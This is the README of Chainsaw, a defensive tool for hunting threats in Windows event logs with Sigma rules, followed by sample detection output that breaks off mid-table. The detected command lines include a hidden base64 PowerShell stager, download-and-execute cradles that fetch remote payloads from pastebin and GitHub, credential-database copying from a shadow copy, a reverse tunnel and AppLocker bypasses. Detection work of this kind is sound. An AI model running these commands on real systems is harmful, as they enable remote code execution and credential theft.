Rapidly Search and Hunt through Windows Event Logs

Related tags

Text search chainsaw
Overview

Rapidly Search and Hunt through Windows Event Logs


Chainsaw provides a powerful ‘first-response’ capability to quickly identify threats within Windows event logs. It offers a generic and fast method of searching through event logs for keywords, and by identifying threats using built-in detection logic and via support for Sigma detection rules.

Features


  • 🔍 Search and extract event log records by event IDs, string matching, and regex patterns
  • 🎯 Hunt for threats using Sigma detection rules and custom built-in detection logic
  • Lightning fast, written in rust, wrapping the EVTX parser library by @OBenamram
  • 🔥 Document tagging (detection logic matching) provided by the TAU Engine Library
  • 📑 Output in an ASCII table format, CSV format, or JSON format

Hunting Logic


Sigma Rule Matching

Using the --rules and --mapping parameters you can specify a directory containing a subset of SIGMA detection rules (or just the entire SIGMA git repo) and chainsaw will automatically load, convert and run these rules against the provided event logs. The mapping file tells chainsaw what event IDs to run the detection rules against, and what fields are relevant. By default the following event IDs are supported:

Event Type Event ID
Process Creation (Sysmon) 1
Network Connections (Sysmon) 3
Image Loads (Sysmon) 7
File Creation (Sysmon) 11
Registry Events (Sysmon) 13
Powershell Script Blocks 4104
Process Creation 4688
Scheduled Task Creation 4698
Service Creation 7045

Built-In Logic

  1. Extraction and parsing of Windows Defender, F-Secure, Sophos, and Kaspersky AV alerts
  2. Detection of key event logs being cleared, or the event log service being stopped
  3. Users being created or added to sensitive user groups
  4. Brute-force of local user accounts
  5. RDP Logins

You can specify the --lateral-all flag to chainsaw to also parse and extract additional 4624 logon types (network logons, service, batch etc.) relating to potential lateral movement that may be interesting for investigations.

Getting Started


You can find pre-compiled versions of chainsaw in the releases section of this Github repo, or you can clone the repo (and the submodules) by running: git clone --recurse-submodules https://github.com/countercept/chainsaw.git

You can then compile the code yourself by running: cargo build --release. Once the build has finished, you will find a copy of the compiled binary in the target/release folder.

Make sure to build with the --release flag as this will ensure significantly faster execution time.

If you want to quickly see what Chainsaw looks like when it runs, you can use the command:

./chainsaw hunt evtx_attack_samples/ --rules sigma_rules/ --mapping mapping_files/sigma-mapping.yml

Supporting Additional Event IDs (via Mapping Files)

When using Sigma rule detection logic, Chainsaw requires a 'mapping file' to tell it which event IDs to check, what fields are important, and which fields to output in the table view. The included sigma mapping in the "mapping_files" directory already supports most of the key Event IDs, but if you want to add support for additional event IDs you can use this mapping file as a template.

Examples


Searching

Help Output:

USAGE:
    chainsaw search [FLAGS] [OPTIONS] <evtx-path>

FLAGS:
    -i, --case_insensitive
    -h, --help                Prints help information
    -V, --version             Prints version information

OPTIONS:
    -e, --event <event-id>
    -o, --output <output-file>
    -r, --regex_search <search-regex>
    -s, --string <search-string>

ARGS:
    <evtx-path>

Command Examples

Search all .evtx files in the evtx_files dir for event id 4624

./chainsaw search ~/Downloads/evtx_files/ -e 4624

Search a specific evtx log for logon events containing the string "bob" (case insensitive)

./chainsaw search ~/Downloads/evtx_files/security.evtx -e 4624 -s "bob" -i

Search a specific evtx log for logon events, with a matching regex pattern. Save results to file

 ./chainsaw search ~/Downloads/evtx_files/security.evtx -e 4624 -r "bob[a-zA-Z]" -o out.txt

Hunting

Help Output:

USAGE:
	chainsaw hunt [FLAGS] [OPTIONS] <evtx-path>

FLAGS:
        --csv
            Save hunt output to individual CSV file, otherwise output in a table format

        --no-builtin
            Do not use inbuilt detection logic, only use the specified rules for detection

        --full
            Show full event output, otherwise output is trunctated to improve readability

    -h, --help
            Prints help information

        --lateral-all
            List additional 4624 events potentially relating to lateral movement

    -V, --version
            Prints version information


OPTIONS:
        --col-width <col-width>
            Change the maximum column width (default 40). Use this option if the table output is un-readable [default:
            40]
        --json <json-output>
            Save the full event log and associated detections to disk in a JSON format to the specified path

    -m, --mapping <mapping-path>
            Specify the mapping file to use to with the specified detection rules. Required when using the --rule/-r
            flag
    -r, --rules <rules-path>
            Specify a directory containing detection rules to use. All files matching *.yml will be used


ARGS:
    <evtx-path>
            Specify an EVTX file, or a directory containing the EVTX files to search. If you specify a directory, all
            files matching *.evtx will be used.

            Specifying "win_default" will use "C:\Windows\System32\winevt\Logs\"

Command Examples

Hunt through all event logs in a specific path, show additional information relating to potential lateral movement, and save results to individual CSV files

-> % ./chainsaw hunt evtx_attack_samples/ --lateral-all --csv

 ██████╗██╗  ██╗ █████╗ ██╗███╗   ██╗███████╗ █████╗ ██╗    ██╗
██╔════╝██║  ██║██╔══██╗██║████╗  ██║██╔════╝██╔══██╗██║    ██║
██║     ███████║███████║██║██╔██╗ ██║███████╗███████║██║ █╗ ██║
██║     ██╔══██║██╔══██║██║██║╚██╗██║╚════██║██╔══██║██║███╗██║
╚██████╗██║  ██║██║  ██║██║██║ ╚████║███████║██║  ██║╚███╔███╔╝
 ╚═════╝╚═╝  ╚═╝╚═╝  ╚═╝╚═╝╚═╝  ╚═══╝╚══════╝╚═╝  ╚═╝ ╚══╝╚══╝
    By F-Secure Countercept (Author: @FranticTyping)
[+] Found 20 EVTX files
[!] Continuing without Detection rules, no path provided
[+] Saving results to CSV files

[+] Created chainsaw_2021-06-28T20-42-25/system_log_was_cleared.csv
[+] Created chainsaw_2021-06-28T20-42-25/event_log_service_stopped.csv
[+] Created chainsaw_2021-06-28T20-42-25/new_user_created.csv
[+] Created chainsaw_2021-06-28T20-42-25/4624_logins.csv
[+] Created chainsaw_2021-06-28T20-42-25/user_added_to_interesting_group.csv
[+] Created chainsaw_2021-06-28T20-42-25/audit_log_was_cleared.csv
[+] Created chainsaw_2021-06-28T20-42-25/account_brute_forcing.csv

[+] 18 Detections found

Hunt through all event logs in a specific path, apply detection logic and TAU rules from the specified path

-> % ./chainsaw hunt evtx_attack_samples/ --rules sigma_rules/ --mapping mapping_files/sigma-mapping.yml

 ██████╗██╗  ██╗ █████╗ ██╗███╗   ██╗███████╗ █████╗ ██╗    ██╗
██╔════╝██║  ██║██╔══██╗██║████╗  ██║██╔════╝██╔══██╗██║    ██║
██║     ███████║███████║██║██╔██╗ ██║███████╗███████║██║ █╗ ██║
██║     ██╔══██║██╔══██║██║██║╚██╗██║╚════██║██╔══██║██║███╗██║
╚██████╗██║  ██║██║  ██║██║██║ ╚████║███████║██║  ██║╚███╔███╔╝
 ╚═════╝╚═╝  ╚═╝╚═╝  ╚═╝╚═╝╚═╝  ╚═══╝╚══════╝╚═╝  ╚═╝ ╚══╝╚══╝
    By F-Secure Countercept (Author: @FranticTyping)

[+] Found 266 EVTX files
[+] Loaded 734 detection rules (74 were not loadeD)
[+] Printing results to screen
[+] Hunting: [========================================] 100%

[+] Detection: Security audit log was cleared
┌─────────────────────┬──────┬───────────────────────────────────┬─────────────────┐
│     system_time     │  id  │             computer              │  subject_user   │
├─────────────────────┼──────┼───────────────────────────────────┼─────────────────┤
│ 2019-01-20 07:00:50 │ 1102 │ "WIN-77LTAPHIQ1R.example.corp"    │ "Administrator" │
├─────────────────────┼──────┼───────────────────────────────────┼─────────────────┤
│ 2019-01-20 07:29:57 │ 1102 │ "WIN-77LTAPHIQ1R.example.corp"    │ "Administrator" │
├─────────────────────┼──────┼───────────────────────────────────┼─────────────────┤
│ 2019-11-15 08:19:02 │ 1102 │ "alice.insecurebank.local"        │ "bob"           │
├─────────────────────┼──────┼───────────────────────────────────┼─────────────────┤
│ 2020-07-22 20:29:27 │ 1102 │ "01566s-win16-ir.threebeesco.com" │ "a-jbrown"      │
├─────────────────────┼──────┼───────────────────────────────────┼─────────────────┤
│ 2020-09-02 11:47:39 │ 1102 │ "01566s-win16-ir.threebeesco.com" │ "a-jbrown"      │
├─────────────────────┼──────┼───────────────────────────────────┼─────────────────┤
│ 2020-09-15 18:04:36 │ 1102 │ "MSEDGEWIN10"                     │ "IEUser"        │
├─────────────────────┼──────┼───────────────────────────────────┼─────────────────┤
│ 2020-09-15 19:28:17 │ 1102 │ "01566s-win16-ir.threebeesco.com" │ "a-jbrown"      │
├─────────────────────┼──────┼───────────────────────────────────┼─────────────────┤
│ 2020-09-17 10:57:37 │ 1102 │ "01566s-win16-ir.threebeesco.com" │ "a-jbrown"      │
├─────────────────────┼──────┼───────────────────────────────────┼─────────────────┤
│ 2020-09-23 16:49:41 │ 1102 │ "01566s-win16-ir.threebeesco.com" │ "Administrator" │
└─────────────────────┴──────┴───────────────────────────────────┴─────────────────┘

[+] Detection: Suspicious Command Line
┌─────────────────────┬──────┬──────────────────────────────┬─────────────────────┬─────────────────────────────┬───────────────────────────────────┐
│     system_time     │  id  │       detection_rules        │    computer_name    │ Event.EventData.CommandLine │           process_name            │
├─────────────────────┼──────┼──────────────────────────────┼─────────────────────┼─────────────────────────────┼───────────────────────────────────┤
│ 2019-02-13 18:03:28 │ 4688 │ ‣ Exfiltration and Tunneling │ "PC01.example.corp" │ <empty>                     │ C:\Users\user01\Desktop\plink.exe │
│                     │      │ Tools Execution              │                     │                             │                                   │
└─────────────────────┴──────┴──────────────────────────────┴─────────────────────┴─────────────────────────────┴───────────────────────────────────┘

[+] Detection: Suspicious Process Creation
┌─────────────────────┬────┬──────────────────────────────────────────┬────────────────────────────────┬────────────────────────────────────────────────────┬────────────────────────────────────────────────────┐
│     system_time     │ id │             detection_rules              │         computer_name          │               Event.EventData.Image                │                    command_line                    │
├─────────────────────┼────┼──────────────────────────────────────────┼────────────────────────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤
│ 2019-02-16 10:02:21 │ 1  │ ‣ Exfiltration and Tunneling             │ "PC01.example.corp"            │ C:\Users\IEUser\Desktop\plink.exe                  │ plink.exe 10.0.2.18 -P 80 -C -R 127.0.0.3:4444:127 │
│                     │    │ Tools Execution                          │                                │                                                    │ .0.0.2:3389 -l test -pw test                       │
├─────────────────────┼────┼──────────────────────────────────────────┼────────────────────────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤
│ 2019-03-17 20:18:09 │ 1  │ ‣ Netsh Port or Application              │ "PC04.example.corp"            │ C:\Windows\System32\netsh.exe                      │ netsh advfirewall firewall add rule name="Remote D │
│                     │    │ Allowed                                  │                                │                                                    │ esktop" dir=in protocol=tcp localport=3389 profile │
│                     │    │ ‣ Netsh RDP Port Opening                 │                                │                                                    │ =any action=allow                                  │
├─────────────────────┼────┼──────────────────────────────────────────┼────────────────────────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤
│ 2019-03-17 20:20:17 │ 1  │ ‣ File or Folder Permissions             │ "PC04.example.corp"            │ C:\Windows\System32\icacls.exe                     │ "C:\Windows\System32\icacls.exe" C:\Windows\System │
│                     │    │ Modifications                            │                                │                                                    │ 32\termsrv.dll /grant %%username%%:F               │
├─────────────────────┼────┼──────────────────────────────────────────┼────────────────────────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤
│ 2019-03-17 20:20:17 │ 1  │ ‣ File or Folder Permissions             │ "PC04.example.corp"            │ C:\Windows\System32\icacls.exe                     │ "C:\Windows\System32\icacls.exe" C:\Windows\System │
│                     │    │ Modifications                            │                                │                                                    │ 32\termsrv.dll /grant *S-1-1-0:(F)                 │
├─────────────────────┼────┼──────────────────────────────────────────┼────────────────────────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤
│ 2019-04-27 18:47:00 │ 1  │ ‣ Execution from Suspicious              │ "IEWIN7"                       │ C:\Users\Public\KeeFarce.exe                       │ KeeFarce.exe                                       │
│                     │    │ Folder                                   │                                │                                                    │                                                    │
├─────────────────────┼────┼──────────────────────────────────────────┼────────────────────────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤
│ 2019-04-29 20:59:21 │ 1  │ ‣ Non Interactive PowerShell             │ "IEWIN7"                       │ C:\Windows\System32\WindowsPowerShell\v1.0\powersh │ "C:\Windows\System32\WindowsPowerShell\v1.0\powers │
│                     │    │                                          │                                │ ell.exe                                            │ hell.exe" -s -NoLogo -NoProfile                    │
├─────────────────────┼────┼──────────────────────────────────────────┼────────────────────────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤
│ 2019-04-29 20:59:22 │ 1  │ ‣ Local Accounts Discovery               │ "IEWIN7"                       │ C:\Windows\System32\whoami.exe                     │ "C:\Windows\system32\whoami.exe" /all              │
├─────────────────────┼────┼──────────────────────────────────────────┼────────────────────────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤
│ 2019-04-30 07:46:15 │ 1  │ ‣ Meterpreter or Cobalt                  │ "IEWIN7"                       │ C:\Windows\System32\cmd.exe                        │ cmd.exe /c echo msdhch > \\.\pipe\msdhch           │
│                     │    │ Strike Getsystem Service                 │                                │                                                    │                                                    │
│                     │    │ Start                                    │                                │                                                    │                                                    │
├─────────────────────┼────┼──────────────────────────────────────────┼────────────────────────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤
│ 2019-04-30 20:26:52 │ 1  │ ‣ Mimikatz Command Line                  │ "IEWIN7"                       │ C:\Windows\System32\cmd.exe                        │ C:\Windows\system32\cmd.exe /b /c start /b /min po │
│                     │    │ ‣ FromBase64String Command               │                                │                                                    │ wershell.exe -nop -w hidden -noni -c "if([IntPtr]: │
│                     │    │ Line                                     │                                │                                                    │ :Size -eq 4){$b='powershell.exe'}else{$b=$env:wind │
│                     │    │ ‣ Curl Start Combination                 │                                │                                                    │ ir+'\syswow64\WindowsPowerShell\v1.0\powershell.ex │
│                     │    │                                          │                                │                                                    │ e'};$s=New-Object System.Diagnostics.ProcessStartI │
│                     │    │                                          │                                │                                                    │ nfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hid │
│                     │    │                                          │                                │                                                    │ den -c &([scriptblock]::create((New-Object IO.Stre │
│                     │    │                                          │                                │                                                    │ amReader(New-Object IO.Compression.GzipStream((New │
│                     │    │                                          │                                │                                                    │ -Object IO.MemoryStream(,[Convert]::FromBase64Stri │
│                     │    │                                          │                                │                                                    │ ng(''H4sIAIuvyFwCA7VW+2/aSBD+OZH6P1gVErZCMA60aSJVu │
│                     │    │                                          │                                │                                                    │ jVPE5xADITHodNir+0lay/Ya169/u83Btym1/SuPeksHruzM7M │
│                     │    │                                          │                                │                                                    │ z33w7azcJbUF5KM2DxU1J+vTm/KyLIxxIco6MClKOmsrZGQhz5 │
│                     │    │                                          │                                │                                                    │ Er6KMlTtFzWeIBpOLu9rSZRREJxnBebRKA4JsGcURLLivSn9OS │
│                     │    │                                          │                                │                                                    │ TiFw+zBfEFtInKfdHscn4HLOT2q6KbZ9Ilyh00rUOt3EaSdFaM │
│                     │    │                                          │                                │                                                    │ irk/O+/55XppTYr1lcJZrGct3axIEHRYSyvSJ+VdMP+bknkvEn │
│                     │    │                                          │                                │                                                    │ tiMfcFcUnGpavioMwxi65B29rYhLhcyfOK5ADfCIikiiUIJvU/ │
│                     │    │                                          │                                │                                                    │ Lgo52HYjbiNHCcicZwvSNPU8XQ2+02ennZ9TEJBA1I0QkEivrR │
│                     │    │                                          │                                │                                                    │ ItKY2iYstHDqMPBJ3BlaWiGjozRQF1Nb8mci5MGGsIP2KG/meb │
│                     │    │                                          │                                │                                                    │ DLMftZIfmkEWl0RKYW0gn/P0uROwsjRLv9KmFBzBZ5j3QGyz2/ │
│                     │    │                                          │                                │                                                    │ O35y7GUVWdyP6kiEwOpsexgQCk7s8pg...                 │
│                     │    │                                          │                                │                                                    │                                                    │
│                     │    │                                          │                                │                                                    │ (use --full to show all content)                   │
├─────────────────────┼────┼──────────────────────────────────────────┼────────────────────────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤
│ 2019-04-30 20:26:52 │ 1  │ ‣ Mimikatz Command Line                  │ "IEWIN7"                       │ C:\Windows\System32\WindowsPowerShell\v1.0\powersh │ powershell.exe -nop -w hidden -noni -c "if([IntPtr │
│                     │    │ ‣ FromBase64String Command               │                                │ ell.exe                                            │ ]::Size -eq 4){$b='powershell.exe'}else{$b=$env:wi │
│                     │    │ Line                                     │                                │                                                    │ ndir+'\syswow64\WindowsPowerShell\v1.0\powershell. │
│                     │    │ ‣ Non Interactive PowerShell             │                                │                                                    │ exe'};$s=New-Object System.Diagnostics.ProcessStar │
│                     │    │                                          │                                │                                                    │ tInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w h │
│                     │    │                                          │                                │                                                    │ idden -c &([scriptblock]::create((New-Object IO.St │
│                     │    │                                          │                                │                                                    │ reamReader(New-Object IO.Compression.GzipStream((N │
│                     │    │                                          │                                │                                                    │ ew-Object IO.MemoryStream(,[Convert]::FromBase64St │
│                     │    │                                          │                                │                                                    │ ring(''H4sIAIuvyFwCA7VW+2/aSBD+OZH6P1gVErZCMA60aSJ │
│                     │    │                                          │                                │                                                    │ VujVPE5xADITHodNir+0lay/Ya169/u83Btym1/SuPeksHruzM │
│                     │    │                                          │                                │                                                    │ 7Mz33w7azcJbUF5KM2DxU1J+vTm/KyLIxxIco6MClKOmsrZGQh │
│                     │    │                                          │                                │                                                    │ z5Er6KMlTtFzWeIBpOLu9rSZRREJxnBebRKA4JsGcURLLivSn9 │
│                     │    │                                          │                                │                                                    │ OSTiFw+zBfEFtInKfdHscn4HLOT2q6KbZ9Ilyh00rUOt3EaSdF │
│                     │    │                                          │                                │                                                    │ aMirk/O+/55XppTYr1lcJZrGct3axIEHRYSyvSJ+VdMP+bknkv │
│                     │    │                                          │                                │                                                    │ EntiMfcFcUnGpavioMwxi65B29rYhLhcyfOK5ADfCIikiiUIJv │
│                     │    │                                          │                                │                                                    │ U/Lgo52HYjbiNHCcicZwvSNPU8XQ2+02ennZ9TEJBA1I0QkEiv │
│                     │    │                                          │                                │                                                    │ rRItKY2iYstHDqMPBJ3BlaWiGjozRQF1Nb8mci5MGGsIP2KG/m │
│                     │    │                                          │                                │                                                    │ ebDLMftZIfmkEWl0RKYW0gn/P0uROwsjRLv9KmFBzBZ5j3QGyz │
│                     │    │                                          │                                │                                                    │ 2/O35y7GUVWdyP6kiEwOpsexgQCk7s8pge9j1KpIJmwCRY82sE │
│                     │    │                                          │                                │                                                    │ 0148Sosy+wCrl3Gbhx9ZapgqKfP+0Bd...                 │
│                     │    │                                          │                                │                                                    │                                                    │
│                     │    │                                          │                                │                                                    │ (use --full to show all content)                   │
├─────────────────────┼────┼──────────────────────────────────────────┼────────────────────────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤
│ 2019-07-19 15:11:26 │ 1  │ ‣ Shadow Copies Creation                 │ "MSEDGEWIN10"                  │ C:\Windows\System32\vssadmin.exe                   │ vssadmin.exe create shadow /for=C:                 │
│                     │    │ Using Operating Systems                  │                                │                                                    │                                                    │
│                     │    │ Utilities                                │                                │                                                    │                                                    │
├─────────────────────┼────┼──────────────────────────────────────────┼────────────────────────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤
│ 2019-07-19 15:11:27 │ 1  │ ‣ Copying Sensitive Files                │ "MSEDGEWIN10"                  │ C:\Windows\System32\cmd.exe                        │ "C:\Windows\system32\cmd.exe" /c "copy \\?\GLOBALR │
│                     │    │ with Credential Data                     │                                │                                                    │ OOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\ │
│                     │    │                                          │                                │                                                    │ NTDS.dit C:\Extract\ntds.dit"                      │
├─────────────────────┼────┼──────────────────────────────────────────┼────────────────────────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤
│ 2019-07-19 15:11:27 │ 1  │ ‣ Copying Sensitive Files                │ "MSEDGEWIN10"                  │ C:\Windows\System32\cmd.exe                        │ "C:\Windows\system32\cmd.exe" /c "copy \\?\GLOBALR │
│                     │    │ with Credential Data                     │                                │                                                    │ OOT\Device\HarddiskVolumeShadowCopy1\Windows\Syste │
│                     │    │                                          │                                │                                                    │ m32\config\SYSTEM C:\Extract\VSC_SYSTEM_HIVE"      │
├─────────────────────┼────┼──────────────────────────────────────────┼────────────────────────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤
│ 2019-07-26 07:39:14 │ 1  │ ‣ HH.exe Execution                       │ "MSEDGEWIN10"                  │ C:\Windows\hh.exe                                  │ "C:\Windows\hh.exe" C:\Users\IEUser\Desktop\Fax Re │
│                     │    │                                          │                                │                                                    │ cord N104F.chm                                     │
├─────────────────────┼────┼──────────────────────────────────────────┼────────────────────────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤
│ 2019-07-26 07:39:14 │ 1  │ ‣ HTML Help Shell Spawn                  │ "MSEDGEWIN10"                  │ C:\Windows\System32\cmd.exe                        │ "C:\Windows\System32\cmd.exe" /c copy /Y C:\Window │
│                     │    │ ‣ Suspicious Rundll32 Activity           │                                │                                                    │ s\system32\rundll32.exe %%TEMP%%\out.exe > nul &&  │
│                     │    │                                          │                                │                                                    │ %%TEMP%%\out.exe javascript:"\..\mshtml RunHTMLApp │
│                     │    │                                          │                                │                                                    │ lication ";document.write();h=new%%20ActiveXObject │
│                     │    │                                          │                                │                                                    │ ("WinHttp.WinHttpRequest.5.1");h.Open("GET","http: │
│                     │    │                                          │                                │                                                    │ //pastebin.com/raw/y2CjnRtH",false);try{h.Send();b │
│                     │    │                                          │                                │                                                    │ =h.ResponseText;eval(b);}catch(e){new%%20ActiveXOb │
│                     │    │                                          │                                │                                                    │ ject("WScript.Shell").Run("cmd /c taskkill /f /im  │
│                     │    │                                          │                                │                                                    │ out.exe",0,true);}                                 │
├─────────────────────┼────┼──────────────────────────────────────────┼────────────────────────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤
│ 2019-07-29 21:11:17 │ 1  │ ‣ Suspicious Rundll32 Activity           │ "MSEDGEWIN10"                  │ C:\Windows\System32\rundll32.exe                   │ "C:\Windows\system32\rundll32.exe" Shell32.dll,Con │
│                     │    │                                          │                                │                                                    │ trol_RunDLL "C:\Users\IEUser\Downloads\Invoice@058 │
│                     │    │                                          │                                │                                                    │ 2.cpl",                                            │
├─────────────────────┼────┼──────────────────────────────────────────┼────────────────────────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤
│ 2019-07-29 21:11:17 │ 1  │ ‣ Suspicious Call by Ordinal             │ "MSEDGEWIN10"                  │ C:\Windows\SysWOW64\rundll32.exe                   │ "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\Sys │
│                     │    │                                          │                                │                                                    │ WOW64\shell32.dll",#44 "C:\Users\IEUser\Downloads\ │
│                     │    │                                          │                                │                                                    │ [email protected]",                                 │
├─────────────────────┼────┼──────────────────────────────────────────┼────────────────────────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤
│ 2019-07-29 21:32:58 │ 1  │ ‣ Suspicious Certutil Command            │ "MSEDGEWIN10"                  │ C:\Windows\System32\cmd.exe                        │ cmd /c certutil -f -decode fi.b64 AllTheThings.dll │
│                     │    │                                          │                                │                                                    │                                                    │
├─────────────────────┼────┼──────────────────────────────────────────┼────────────────────────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤
│ 2019-07-29 21:32:59 │ 1  │ ‣ Suspicious Certutil Command            │ "MSEDGEWIN10"                  │ C:\Windows\System32\certutil.exe                   │ certutil -f -decode fi.b64 AllTheThings.dll        │
├─────────────────────┼────┼──────────────────────────────────────────┼────────────────────────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤
│ 2019-07-29 21:33:03 │ 1  │ ‣ Bitsadmin Download                     │ "MSEDGEWIN10"                  │ C:\Windows\System32\bitsadmin.exe                  │ bitsadmin.exe /transfer "JobName" https://raw.gith │
│                     │    │                                          │                                │                                                    │ ubusercontent.com/op7ic/EDR-Testing-Script/master/ │
│                     │    │                                          │                                │                                                    │ Payloads/CradleTest.txt "C:\Windows\system32\Defau │
│                     │    │                                          │                                │                                                    │ lt_File_Path.ps1"                                  │
├─────────────────────┼────┼──────────────────────────────────────────┼────────────────────────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤
│ 2019-07-29 21:33:18 │ 1  │ ‣ Mshta JavaScript Execution             │ "MSEDGEWIN10"                  │ C:\Windows\System32\mshta.exe                      │ mshta.exe javascript:a=GetObject("script:https://r │
│                     │    │ ‣ Suspicious Rundll32 Activity           │                                │                                                    │ aw.githubusercontent.com/op7ic/EDR-Testing-Script/ │
│                     │    │                                          │                                │                                                    │ master/Payloads/Mshta_calc.sct").Exec();close();   │
├─────────────────────┼────┼──────────────────────────────────────────┼────────────────────────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤
│ 2019-07-29 21:33:23 │ 1  │ ‣ Encoded PowerShell Command             │ "MSEDGEWIN10"                  │ C:\Windows\System32\WindowsPowerShell\v1.0\powersh │ powershell -c "(New-Object Net.WebClient).Download │
│                     │    │ Line                                     │                                │ ell.exe                                            │ File('https://raw.githubusercontent.com/op7ic/EDR- │
│                     │    │ ‣ Non Interactive PowerShell             │                                │                                                    │ Testing-Script/master/Payloads/CradleTest.txt','De │
│                     │    │                                          │                                │                                                    │ fault_File_Path.ps1');IEX((-Join([IO.File]::ReadAl │
│                     │    │                                          │                                │                                                    │ lBytes('Default_File_Path.ps1')|ForEach-Object{[Ch │
│                     │    │                                          │                                │                                                    │ ar]$_})))"                                         │
├─────────────────────┼────┼──────────────────────────────────────────┼────────────────────────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤
│ 2019-07-29 21:33:28 │ 1  │ ‣ Possible Applocker Bypass              │ "MSEDGEWIN10"                  │ C:\Windows\System32\cmd.exe                        │ cmd /c C:\Windows\Microsoft.NET\Framework\v4.0.303 │
│                     │    │                                          │                                │                                                    │ 19\regsvcs.exe AllTheThings.dll                    │
├─────────────────────┼────┼──────────────────────────────────────────┼────────────────────────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤
│ 2019-07-29 21:33:28 │ 1  │ ‣ Possible Applocker Bypass              │ "MSEDGEWIN10"                  │ C:\Windows\System32\cmd.exe                        │ cmd /c C:\Windows\Microsoft.NET\Framework\v2.0.507 │
│                     │    │                                          │                                │                                                    │ 27\regsvcs.exe AllTheThings.dll                    │
├─────────────────────┼────┼──────────────────────────────────────────┼────────────────────────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤
│ 2019-07-29 21:33:29 │ 1  │ ‣ Possible Applocker Bypass              │ "MSEDGEWIN10"                  │ C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegS │ C:\Windows\Microsoft.NET\Framework\v4.0.30319\regs │
│                     │    │                                          │                                │ vcs.exe                                            │ vcs.exe AllTheThings.dll                           │
├─────────────────────┼────┼──────────────────────────────────────────┼────────────────────────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤
│ 2019-07-29 21:33:29 │ 1  │ ‣ Possible Applocker Bypass              │ "MSEDGEWIN10"                  │ C:\Windows\System32\cmd.exe                        │ cmd /c C:\Windows\Microsoft.NET\Framework64\v2.0.5 │
│                     │    │                                          │                                │                                                    │ 0727\regsvcs.exe AllTheThings.dll                  │
├─────────────────────┼────┼──────────────────────────────────────────┼────────────────────────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤
│ 2019-07-29 21:33:29 │ 1  │ ‣ Possible Applocker Bypass              │ "MSEDGEWIN10"                  │ C:\Windows\System32\cmd.exe                        │ cmd /c C:\Windows\Microsoft.NET\Framework64\v4.0.3 │
│                     │    │                                          │                                │                                                    │ 0319\regsvcs.exe AllTheThings.dll                  │
├─────────────────────┼────┼──────────────────────────────────────────┼────────────────────────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤
│ 2019-07-29 21:33:34 │ 1  │ ‣ Possible Applocker Bypass              │ "MSEDGEWIN10"                  │ C:\Windows\System32\cmd.exe                        │ cmd /c C:\Windows\Microsoft.NET\Framework\v2.0.507 │
│                     │    │                                          │                                │                                                    │ 27\regasm.exe /U AllTheThings.dll                  │
├─────────────────────┼────┼──────────────────────────────────────────┼────────────────────────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤
│ 2020-12-04 22:41:04 │ 1  │ ‣ Suspicious Svchost Process             │ "MSEDGEWIN10"                  │ C:\Windows\System32\svchost.exe                    │ C:\Windows\system32\svchost.exe -k localService -p │
│                     │    │ ‣ Windows Processes Suspicious           │                                │                                                    │  -s RemoteRegistry                                 │
│                     │    │ Parent Directory                         │                                │                                                    │                                                    │
├─────────────────────┼────┼──────────────────────────────────────────┼────────────────────────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤
│ 2020-12-09 16:52:34 │ 1  │ ‣ Execution from Suspicious              │ "MSEDGEWIN10"                  │ C:\Users\Public\psexecprivesc.exe                  │ "C:\Users\Public\psexecprivesc.exe" C:\Windows\Sys │
│                     │    │ Folder                                   │                                │                                                    │ tem32\mspaint.exe                                  │
├─────────────────────┼────┼──────────────────────────────────────────┼────────────────────────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤
│ 2020-12-09 16:52:41 │ 1  │ ‣ PsExec Service Start                   │ "MSEDGEWIN10"                  │ C:\Windows\PSEXESVC.exe                            │ C:\Windows\PSEXESVC.exe                            │
├─────────────────────┼────┼──────────────────────────────────────────┼────────────────────────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤
│ 2021-01-26 13:21:13 │ 1  │ ‣ Possible Applocker Bypass              │ "LAPTOP-JU4M3I0E"              │ C:\Program Files (x86)\Microsoft Visual Studio\201 │ C:\Program Files (x86)\Microsoft Visual Studio\201 │
│                     │    │                                          │                                │ 9\Community\MSBuild\Current\Bin\MSBuild.exe        │ 9\Community\MSBuild\Current\Bin\MSBuild.exe /nolog │
│                     │    │                                          │                                │                                                    │ o /nodemode:1 /nodeReuse:true /low:false           │
├─────────────────────┼────┼──────────────────────────────────────────┼────────────────────────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤
